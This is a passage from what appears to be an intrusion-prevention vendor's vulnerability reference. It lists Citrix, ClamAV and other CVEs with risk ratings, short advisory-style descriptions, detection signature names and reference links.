Situation: Generic_CS-CitectSCADA-ODBC-Service-Buffer-Overflow
References:
CVE-2008-2639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2639
BID-29634
http://www.securityfocus.com/bid/29634
Back to top

Citrix-Access-Gateway-Command-Execution

About this vulnerability: A Citrix Access Gateway Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-716-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Access Gateway
Type: Input Validation
Description: A vulnerability in Citrix Access Gateway, versions 9.2-49.8 and before, which allows remote attackers to execute arbitrary commands via shell metacharacters in the password field.
Situation: HTTP_CRL-Citrix-Access-Gateway-Command-Execution
References:
CVE-2010-4566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4566
BID-45402
http://www.securityfocus.com/bid/45402
OSVDB-70099
http://www.osvdb.org/70099
Back to top

Citrix-Access-Gateway-Plug-In-For-Windows-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Citrix Systems Access Gateway Plug-in for Windows
Risk: Moderate
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Systems Access Gateway Plug-in for Windows
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Citrix Access Gateway Plug-in for Windows. The vulnerability is due to insufficient validation of the "CSEC" header field in the HTTP responses to the requests sent by the StartEpa() method. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to access a maliciously crafted web page. This can result in code execution in the context of the current logged in user.
Situation: HTTP_SHS-Citrix-Access-Gateway-Plug-In-For-Windows-ActiveX-Control-BOF
References:
CVE-2011-2592
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2592
BID-54754
http://www.securityfocus.com/bid/54754
OSVDB-84433
http://www.osvdb.org/84433
Back to top

Citrix-Application-Delivery-Controller-And-Gateway-Information-Disclosure

About this vulnerability: A vulnerability in Citrix Systems ADC and Citrix Gateway
Risk: Moderate
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: Citrix Application Delivery Controller; Citrix Gateway
Type: Malfunction
Description: There exists an information disclosure vulnerability in Citrix Application Delivery Controller and Gateway. Succesful exploitation could lead in sensitive information disclosure. This situation also covers the vulnerability CVE-2020-8196.
Situation: HTTP_CSU-Citrix-Application-Delivery-Controller-And-Gateway-Information-Disclosure
References:
CVE-2020-8195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8195
Back to top

Citrix-Authorization-Bypass-CVE-2020-8193

About this vulnerability: Authorization bypass vulnerability in Citrix
Risk: High
First detected in: sgpkg-ips-1262-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Application Delivery Controller;Citrix Gateway;Citrix SDWAN WANOP
Type: Malfunction
Description: There exists an authorization bypass vulnerability in Citrix. Successful exploitation of this issue can result in unauthorized access to restricted files.
Situation: HTTP_CRL-Citrix-Authorization-Bypass-CVE-2020-8193
HTTP_CRL-Citrix-Forced-New-nsroot-Session
HTTP_CHS-Citrix-Authorization-Bypass-CVE-2020-8193
References:
CVE-2020-8193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8193
Back to top

Citrix-Code-Injection-CVE-2020-8194

About this vulnerability: Code Injection vulnerability in Citrix
Risk: High
First detected in: sgpkg-ips-1262-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Application Delivery Controller;Citrix Gateway;Citrix SDWAN WANOP
Type: Input Validation
Description: There exists a code injection vulnerability in Citrix. Successful exploitation of this issue can result in unauthenticated remote code execution.
Situation: HTTP_CRL-Citrix-Code-Injection-CVE-2020-8194
References:
CVE-2020-8194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8194
Back to top

Citrix-Code-Injection-CVE-2023-3519

About this vulnerability: A vulnerability in Citrix
Risk: Critical
First detected in: sgpkg-ips-1615-5242
Last changed: sgpkg-ips-1615-5242
Platform: Generic
Software: Citrix Application Delivery Controller; Citrix Gateway
Type: Input Validation
Description: A code injection vulnerability has been reported in Citrix NetScaler ADC and NetScaler Gateway. Successful exploitation of this vulnerability can result in unauthenticated remote code execution.
Situation: HTTP_CRL-Citrix-Code-Injection-CVE-2023-3519
References:
CVE-2023-3519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3519
Back to top

Citrix-Cross-Site-Scripting-CVE-2020-8191

About this vulnerability: Cross site scripting vulnerability in Citrix
Risk: High
First detected in: sgpkg-ips-1262-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Application Delivery Controller;Citrix Gateway;Citrix SDWAN WANOP
Type: Cross-site Scripting
Description: There exists a cross site scripting vulnerability in Citrix. Successful exploitation of this issue can result in unauthenticated remote code execution.
Situation: HTTP_CRL-Citrix-Cross-Site-Scripting-CVE-2020-8191
References:
CVE-2020-8191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8191
Back to top

Citrix-IMA-Service-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Citrix IMA service detected
Risk: High
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Citrix Access Essentials; Citrix Presentation Server; Citrix Desktop Server; Citrix MetaFrame Presentation Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Independent Management Architecture (IMA) service in various Citrix products. The service does not sufficiently validate user-supplied data received from the network. A crafted data packet may overflow a static buffer, which leads to execution of arbitrary code in the context of the IMA service. The service typically runs with SYSTEM privilege.
Situation: Generic_CS-Citrix-IMA-Service-Buffer-Overflow
References:
CVE-2008-0356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0356
BID-27329
http://www.securityfocus.com/bid/27329
Back to top

Citrix-MetaFrame-IMA-Authentication-Processing-Buffer-Overflow

About this vulnerability: A Citrix MetaFrame IMA Authentication Processing Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix MetaFrame
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Citrix MetaFrame IMA Authentication which allows remote attackers to execute arbitrary code by sending a specially crafted packet to the IMA process on a vulnerable server.
Situation: Generic_CS-Citrix-MetaFrame-IMA-Authentication-Processing-Buffer-Overflow
References:
CVE-2006-5821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5821
Back to top

Citrix-NetScaler-Buffer-Overflow-Vulnerability-CVE-2023-4966

About this vulnerability: An attempt to exploit a vulnerability in Citrix NetScaler detected
Risk: High
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Platform: Generic
Software: Citrix Application Delivery Controller;Citrix Gateway
Type: Input Validation
Description: Citrix NetScaler ADC and NetScaler Gateway contain a buffer overflow vulnerability that allows for sensitive information disclosure when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.
Situation: HTTP_CSH-Oversized-Host-Header-Field
References:
CVE-2023-4966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4966
Back to top

Citrix-NetScaler-SD-WAN-CGISESSID-Command-Execution-CVE-2017-6316

About this vulnerability: A vulnerability in Citrix NetScaler SD-WAN
Risk: High
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1468-5242
Platform: Generic
Software: Citrix SD-WAN
Type: Input Validation
Description: A command execution vulnerability has been reported in Citrix NetScaler SD-WAN and Citrix CloudBridge. A remote, unauthenticated attacker could use this vulnerability to execute arbitrary commands via a crafted CGISESSID or CAKEPHP cookie.
Situation: HTTP_CSH-Citrix-NetScaler-SD-WAN-CGISESSID-Command-Execution-CVE-2017-6316
References:
CVE-2017-6316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6316
Back to top

Citrix-Path-Traversal-CVE-2019-19781

About this vulnerability: A vulnerability in Citrix
Risk: High
First detected in: sgpkg-ips-1214-5242
Last changed: sgpkg-ips-1621-5242
Platform: Generic
Software: Citrix Application Delivery Controller; Citrix Gateway
Type: Malfunction
Description: There exists a pre-auth path traversal vulnerability in Citrix Application Delivery Controller and Citrix Gateway. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Citrix-Path-Traversal-CVE-2019-19781
HTTP_CRH-Citrix-Path-Traversal-CVE-2019-19781
HTTP_CRH-Citrix-Path-Traversal-CVE-2019-19781-2
References:
CVE-2019-19781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781
Back to top

Citrix-Presentation-Server-IMA-Invalid-Event-Data-Length-DOS

About this vulnerability: Denial of service vulnerability in Citrix Presentation server
Risk: Moderate
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Presentation Server
Type: Malfunction
Description: There is a denial of service vulnerability in Citrix Presentation server due to a memory access violation. An unauthenticated attacker can send a malicious IMA protocol packet containing event data with a size of zero to the affected service, causing a denial of service.
Situation: Generic_Citrix-Presentation-Server-IMA-Invalid-Event-Data-Length-DOS
References:
CVE-2006-5861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5861
BID-20986
http://www.securityfocus.com/bid/20986
OSVDB-30270
http://www.osvdb.org/30270
Back to top

Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation

About this vulnerability: A vulnerability in Citrix ICA Win32 Program Neighborhood Agent
Risk: Moderate
First detected in: sgpkg-ips-354-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Citrix Program Neighborhood Agent
Type: Malfunction
Description: There exists an arbitrary shortcut creation vulnerability in the Citrix Program Neighborhood Agent. The problem can be triggered by sending a crafted XML response to an affected client. Successful exploitation can allow creation of arbitrary shortcuts which can result in code execution with the privileges of the current user.
Situation: HTTP_SS-Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation
File-TextId_Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation
References:
CVE-2004-1077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1077
BID-13379
http://www.securityfocus.com/bid/13379
Back to top

Citrix-Program-Neighborhood-Agent-Buffer-Overflow

About this vulnerability: A vulnerability in Citrix ICA Win32 Program Neighborhood Agent
Risk: High
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Citrix Program Neighborhood Agent
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the Citrix Program Neighborhood Agent. The problem can be triggered by sending a crafted XML response to the affected client. Successful exploitation can allow for arbitrary code execution with the privileges of the current user.
Situation: HTTP_SS-Citrix-Program-Neighborhood-Agent-Buffer-Overflow
File-TextId_Citrix-Program-Neighborhood-Agent-Buffer-Overflow
References:
CVE-2004-1078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1078
BID-13373
http://www.securityfocus.com/bid/13373
Back to top

Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow

About this vulnerability: A vulnerability in Citrix Systems Provisioning Services
Risk: Moderate
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Provisioning Services
Type: Integer Overflow
Description: There is an integer underflow vulnerability, which can cause a stack buffer overflow, in the PVS Stream Service (streamprocess.exe) component of Citrix Provisioning Service. The vulnerability is due to an error when copying a string into a stack buffer while handling a number of different opcodes. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious request to the target service. A successful attack may allow execution of arbitrary code on the target machine within the security context of the service, which is SYSTEM. If the attack is not successful, the vulnerable service may terminate abnormally, causing a denial-of-service condition.
Situation: Generic_UDP-Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow
Generic_UDP-Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow-2
References:
BID-49803
http://www.securityfocus.com/bid/49803
Back to top

Citrix-Provisioning-Services-Opcode-40020006-Integer-Underflow

About this vulnerability: A vulnerability in Citrix Systems Provisioning Services
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Provisioning Services
Type: Integer Overflow
Description: There is an integer underflow vulnerability, which can cause a stack buffer overflow, in the PVS Stream Service (streamprocess.exe) component of Citrix Provisioning Service. The vulnerability is due to an error when handling a specially crafted packet with opcode 0x40020006. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious request to the target service. A successful attack may allow execution of arbitrary code on the target machine within the security context of the service, which is SYSTEM. If the attack is not successful, the vulnerable service may terminate abnormally, causing a denial-of-service condition.
Situation: Generic_Citrix-Provisioning-Services-Opcode-40020006-Integer-Underflow
Back to top

Citrix-Provisioning-Services-Opcode-40020010-Stack-Buffer-Overflow

About this vulnerability: An attempt to cause a buffer overflow in Citrix Provisioning Services
Risk: High
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Provisioning Services
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Citrix Provisioning Service. The vulnerability is due to an error when handling a specially crafted packet with Opcode 0x40020010 to the Provisioning Services server. A remote attacker could exploit this by sending a malicious packets to the target.
Situation: Generic_Citrix-Provisioning-Services-Opcode-40020010-Stack-Buffer-Overflow
References:
BID-45914
http://www.securityfocus.com/bid/45914
OSVDB-70597
http://www.osvdb.org/70597
Back to top

Citrix-Provisioning-Services-Streamprocess.exe-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Citrix Provisioning Services
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Provisioning Services
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Citrix Provisioning Service. The vulnerability is due to a boundary error when handling a specially crafted packet to the Provisioning Services server. A remote attacker could exploit this by sending a malicious packets to the target. A successful attack may allow remote unauthenticated attackers to execute arbitrary code on the target machine within the security context of the service. If such an attack is not executed successfully, the vulnerable server may terminate abnormally.
Situation: Generic_UDP-Citrix-Provisioning-Services-Streamprocess.exe-Stack-Buffer-Overflow
References:
BID-45914
http://www.securityfocus.com/bid/45914
Back to top

Citrix-SD-WAN-Command-Injection-CVE-2019-12991

About this vulnerability: A vulnerability in Citrix SD-WAN
Risk: High
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1468-5242
Platform: Generic
Software: Citrix SD-WAN
Type: Input Validation
Description: A command injection vulnerability has been reported in Citrix SD-WAN. Successful exploitation of this vulnerability can allow an authenticated attacker to execute arbitrary OS commands as root.
Situation: HTTP_CRL-Citrix-SD-WAN-Command-Injection-CVE-2019-12991
References:
CVE-2019-12991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12991
Back to top

Citrix-SD-WAN-SQL-Injection-CVE-2019-12989

About this vulnerability: A vulnerability in Citrix SD-WAN
Risk: High
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1468-5242
Platform: Generic
Software: Citrix SD-WAN
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Citrix SD-WAN. Successful exploitation of this vulnerability can allow an unauthenticated attacker to write and create files. This can lead to authentication bypass, which may allow the attacker to exploit CVE-2019-12991.
Situation: HTTP_CRL-Citrix-SD-WAN-SQL-Injection-CVE-2019-12989
References:
CVE-2019-12989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12989
Back to top

Citrix-ShareFile-Storage-Zones-Controller-Directory-Traversal

About this vulnerability: A vulnerability in Citrix Systems ShareFile StorageZones Controller
Risk: High
First detected in: sgpkg-ips-1618-5242
Last changed: sgpkg-ips-1618-5242
Platform: Generic
Software: Citrix Systems ShareFile StorageZones Controller
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Citrix ShareFile Storage Zones Controller. The vulnerability is due to improper validation of user input in the ProcessRawPostedFile function. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could allow an attacker to save files to an arbitrary file path under the web root directory, which could lead to the execution of arbitrary code.
Situation: HTTP_CRL-Citrix-ShareFile-Storage-Zones-Controller-Processrawpostedfile-Directory-Traversal
References:
CVE-2023-24489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24489
Back to top

Citrix-ShareFile-Storage-Zones-Controller-Neatupload-Directory-Traversal

About this vulnerability: A vulnerability in Citrix Systems ShareFile StorageZones Controller
Risk: Moderate
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1392-5242
Platform: Generic
Software: Citrix Systems ShareFile StorageZones Controller
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in the NeatUpload library of Citrix ShareFile Storage Zones Controller. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Citrix-ShareFile-Storage-Zones-Controller-Neatupload-Directory-Traversal
References:
CVE-2021-22941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22941
Back to top

Citrix-Virtual-Apps-And-Desktops-Insecure-Deserialization-CVE-2024-8069

About this vulnerability: A vulnerability in Citrix Virtual Apps and Desktops
Risk: High
First detected in: sgpkg-ips-1800-5242
Last changed: sgpkg-ips-1800-5242
Platform: Generic
Software: Citrix Virtual Apps and Desktops
Type: Malfunction
Description: A remote code execution vulnerability has been reported in the Session Recording component of Citrix Virtual Apps and Desktops. This vulnerability is due to an exposed MSMQ functionality, allowing for user-supplied objects to be deserialized with the insecure BinaryFormatter class.
Situation: HTTP_CS-Ysoserial-Generated-DotNet-Serialized-Object-In-A-MSMQ-Message
References:
CVE-2024-8069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8069
Back to top

Citrix-XenApp-And-Xendesktop-Xml-Service-Interface-Uninitialized-Pointer

About this vulnerability: A vulnerability in Citrix Systems Presentation Server
Risk: Moderate
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Presentation Server; Citrix XenApp
Type: Malfunction
Description: A code execution vulnerability exists in Citrix XenApp and XenDesktop server. The vulnerability is caused by accessing an uninitialized pointer in the XML Service interface when processing crafted requests with a malformed URI. A remote unauthenticated attacker could exploit this vulnerability by sending specially crafted packet to the affected service. Successful exploitation could result in code execution with privileges of the XenApp and XenDesktop service account.
Situation: HTTP_CRL-Citrix-XenApp-Xendesktop-Xml-Service-Interface-Uninitialized-Pointer
References:
OSVDB-74158
http://www.osvdb.org/74158
Back to top

Citrix-XenApp-XML-Service-Interface-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Citrix Systems Presentation Server
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Citrix Presentation Server; Citrix XenApp
Type: Buffer Overflow
Description: A code execution vulnerability exists in Citrix XenApp and XenDesktop server. The vulnerability is caused by a stack buffer overflow in the XML Service interface when processing crafted packets with an overly long password field. A remote unauthenticated attacker could exploit this vulnerability by sending specially crafted packet to the affected service. Successful exploitation could result in code execution with privileges of the XenApp and XenDesktop service account.
Situation: HTTP_CS-Citrix-XenApp-XML-Service-Interface-Stack-Buffer-Overflow
References:
BID-48898
http://www.securityfocus.com/bid/48898
OSVDB-74157
http://www.osvdb.org/74157
Back to top

Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in the TNEF decoding in Clam AntiVirus
Risk: Moderate
First detected in: sgpkg-ips-57-1210
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: ClamAV
Type: Malfunction
Description: ClamAV AntiVirus is an open source anti-virus product. The product fails to properly validate TNEF (Transport Neutral Encapsulation Format) encoded data. If the object length value of TNEF data block is negative, it is possible that the product processes the same data block infinitely, resulting in a denial of service condition.
Situation: E-Mail_BS-Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service
File-Binary_Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service
References:
CVE-2005-3500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3500
BID-15316
http://www.securityfocus.com/bid/15316
OSVDB-20483
http://www.osvdb.org/20483
Back to top

Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in ClamAV AntiVirus
Risk: High
First detected in: sgpkg-ips-190-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ClamAV
Type: Malfunction
Description: There is a buffer overflow vulnerability in ClamAV AntiVirus. The vulnerability can be triggered when the application processes crafted JPEG files. An unauthenticated attacker can exploit this vulnerability by delivering a crafted file to the scanning service, resulting in an unchecked recursion that consumes the stack and causes a Denial of Service condition.
Situation: HTTP_SS-Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service
File-JPEG_Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service
File-Binary_Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service
References:
CVE-2008-5314
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5314
BID-32555
http://www.securityfocus.com/bid/32555
OSVDB-50363
http://www.osvdb.org/50363
Back to top

Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in ClamAV antivirus
Risk: Moderate
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ClamAV
Type: Input Validation
Description: There is a denial of service vulnerability in ClamAV AntiVirus. The vulnerability can be triggered when the application processes a crafted CHM file. An unauthenticated attacker can exploit this vulnerability by delivering a crafted file to the scanning engine to cause a denial of service.
Situation: HTTP_SS-Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service
File-Binary_Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service
References:
CVE-2008-1389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1389
BID-30994
http://www.securityfocus.com/bid/30994
Back to top

Clamav-DMG-CLI_scandmg-External-Entity-Injection

About this vulnerability: A vulnerability in ClamAV Project ClamAV
Risk: Moderate
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Platform: Generic
Software: ClamAV
Type: Malfunction
Description: An incorrect XML parser configuration for parsing DMG files causes an external entity injection vulnerability in ClamAV. A successful exploit allows an attacker to read the contents of arbitrary files on the target system.
Situation: File-Binary_Clamav-DMG-CLI_scandmg-External-Entity-Injection
References:
CVE-2023-20052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20052
Back to top

Clamav-Encrypted-PDF-File-Handling-Memory-Access-Error

About this vulnerability: A vulnerability in ClamAV Project ClamAV
Risk: Moderate
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ClamAV
Type: Malfunction
Description: A memory access error exists in ClamAV antivirus. The vulnerability is due to a PDF key length computation error in "pdf.c" while parsing crafted encrypted PDF files. A remote attacker could exploit this vulnerability by causing ClamAV to process a specially crafted PDF file. Successful exploitation would terminate the clamd service resulting in a denial of service condition.
Situation: File-PDF_Clamav-Encrypted-PDF-File-Handling-Memory-Access-Error
References:
CVE-2013-2021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2021
BID-59434
http://www.securityfocus.com/bid/59434
OSVDB-92835
http://www.osvdb.org/92835
Back to top

Clamav-Initialize_Encryption_Key_-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in ClamAV Project ClamAV
Risk: Moderate
First detected in: sgpkg-ips-1694-5242
Last changed: sgpkg-ips-1694-5242
Platform: Generic
Software: ClamAV
Type: Malfunction
Description: Improper string termination parsing causes an out of bounds read vulnerability in ClamAV. A successful exploit allows an attacker to cause a denial of service situation on the target system.
Situation: File-OLE_Clamav-Initialize_Encryption_Key_-Out-Of-Bounds-Read
References:
CVE-2024-20290
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20290
Back to top

Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow

About this vulnerability: A vulnerability in ClamAV
Risk: High
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ClamAV
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the ClamAV AntiVirus product. The vulnerability can be triggered when the application processes crafted PE files. An unauthenticated attacker can exploit this vulnerability by delivering a crafted file to the scanning service, resulting in injection and execution of arbitrary code.
Situation: HTTP_SS-Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow
File-Exe_Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow
References:
CVE-2007-6335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6335
BID-26927
http://www.securityfocus.com/bid/26927
Back to top

Clamav-Ole2-Uniq_Add-Out-of-Bounds-Write

About this vulnerability: A vulnerability in ClamAV
Risk: Moderate
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ClamAV
Type: Malfunction
Description: There has been reported an out-of-bounds write vulnerability in ClamAV. Successful exploitation could lead in denial of service conditions or arbitrary code execution.
Situation: File-OLE_Clamav-Ole2-Uniq_Add-Out-of-Bounds-Write
References:
CVE-2019-1788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1788
Back to top

Clamav-UPX-File-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in ClamAV
Risk: Moderate
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ClamAV
Type: Malfunction
Description: There exists a buffer overflow vulnerability in ClamAV antivirus product. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Exe_Clamav-UPX-File-Handling-Buffer-Overflow
References:
CVE-2005-2920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2920
BID-14866
http://www.securityfocus.com/bid/14866
Back to top

Clamav-UPX-File-Handling-Heap-Overflow

About this vulnerability: A vulnerability in ClamAV Project ClamAV
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ClamAV
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in the ClamAV AntiVirus product. The vulnerability can be triggered when the application processes crafted UPX files. An unauthenticated attacker can exploit this vulnerability by delivering a crafted file to the scanning service resulting in injection and execution of arbitrary code. In a simple attack case aimed at creating a denial of service condition, the affected ClamAV daemon will terminate. In a sophisticated attack scenario where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component would execute in the security context of the affected ClamAV daemon.
Situation: File-Exe_Clamav-UPX-File-Handling-Heap-Overflow
References:
CVE-2006-4018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4018
BID-19381
http://www.securityfocus.com/bid/19381
Back to top

Clamav-UPX-File-Handling-Integer-Overflow

About this vulnerability: A vulnerability in ClamAV Clam AntiVirus
Risk: High
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ClamAV
Type: Integer Overflow
Description: An integer overflow vulnerability exists in ClamAV antivirus software. The vulnerability is due to an error in "upx.c" while parsing UPX-packed executable files. A remote attacker could exploit this vulnerability to cause a denial of service condition on the target system.
Situation: File-Exe_Clamav-UPX-File-Handling-Integer-Overflow
References:
CVE-2015-2170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2170
Back to top

Clamav-UPX-File-PE-Parsing-Memory-Access-Error

About this vulnerability: A vulnerability in ClamAV Project ClamAV
Risk: High
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ClamAV
Type: Malfunction
Description: A memory access error vulnerability exists in ClamAV antivirus software. The vulnerability is due to an errors in "pe.c" while parsing UPX-packed executable files. Remote attackers could exploit the vulnerability to cause a denial of service condition.
Situation: File-Exe_Clamav-UPX-File-PE-Parsing-Memory-Access-Error
References:
CVE-2013-2020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2020
BID-59434
http://www.securityfocus.com/bid/59434
OSVDB-92834
http://www.osvdb.org/92834
Back to top

Clamav-Virusevent-Command-Injection

About this vulnerability: A vulnerability in ClamAV
Risk: Moderate
First detected in: sgpkg-ips-1692-5242
Last changed: sgpkg-ips-1692-5242
Platform: Generic
Software: ClamAV
Type: Input Validation
Description: Improper handling of input used to generate command strings causes a command injection vulnerability in ClamAV. A successful exploit may allow an attacker to execute arbitrary commands on the target system.
Situation: HTTP_SHS-Clamav-Virusevent-Command-Injection
References:
CVE-2024-20328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20328
Back to top

Clampi-Bot

About this vulnerability: Clampi Bot
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Clampi is a Bot used to steal credentials and passwords from the infected machine.
Situation: HTTP_CS-Clampi-Bot-Traffic
Back to top

Claymore-Dual-GPU-Miner-Format-String-DOS-Attack

About this vulnerability: A Claymore Dual GPU Miner Format String DOS Attack Vulnerability
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Claymore Dual GPU Miner
Type: Input Validation
Description: A vulnerability in Claymore Dual GPU Miner, versions 10.5 and below, which allows remote attackers to read memory addresses or immediately terminate mining processes causing a denial of service condition, due to the lack of input validation.
Situation: Generic_CS-Claymore-Dual-GPU-Miner-Format-String-DOS-Attack
References:
CVE-2018-6317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6317
Back to top

ClearSCADA-DBServer-Denial-Of-Service

About this vulnerability: ClearSCADA DBServer DOS and potential sensitive information disclosure.
Risk: High
First detected in: sgpkg-ips-628-5211
